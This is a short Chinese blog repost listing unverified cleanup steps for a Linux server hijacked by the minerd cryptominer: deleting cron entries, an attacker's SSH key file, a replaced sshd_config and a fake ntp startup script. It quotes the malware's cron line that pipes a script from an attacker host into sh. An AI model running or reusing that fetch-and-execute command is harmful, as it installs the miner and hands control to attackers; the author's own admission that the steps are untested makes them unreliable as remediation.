标签:ssh chmod 删除 usr authorize 防止 http 启动文件 直接
cd /opt chmod -x minerd 去/root/.ssh 目录下,清除authorized_keys,KHK75NEOiq 文件 在ssh的配置文件/etc/ssh/sshd_config中也可以看到把AuthorizedKeysFile指向了这个文件了(.ssh/KHK75NEOiq) 1、crontab上的命令删除掉 "*/10* * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" >/var/spool/cron/root mkdir-p /var/spool/cron/crontabs "*/10* * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" >/var/spool/cron/crontabs/root 2、去掉ssh/authorized_keys ~/.ssh/KHK75NEOiq 被替换的/etc/ssh/sshd_config拿其他服务器上的替换掉。替换后重启sshd,记得更改root相关密码,防止黑客登陆。 3、删除相关管理的黑客程序启动文件,伪进程/etc/init.d/ntp删除并kill掉它启动的进程; 4、/usr/local/etc/minerd.conf里的minerd启动配置删除或者直接删除/usr/local/etc/minerd.conf
ps:在群里看到的不知道有没有效,没验证过
标签:ssh chmod 删除 usr authorize 防止 http 启动文件 直接
原文地址:https://www.cnblogs.com/pcx105/p/9629606.html
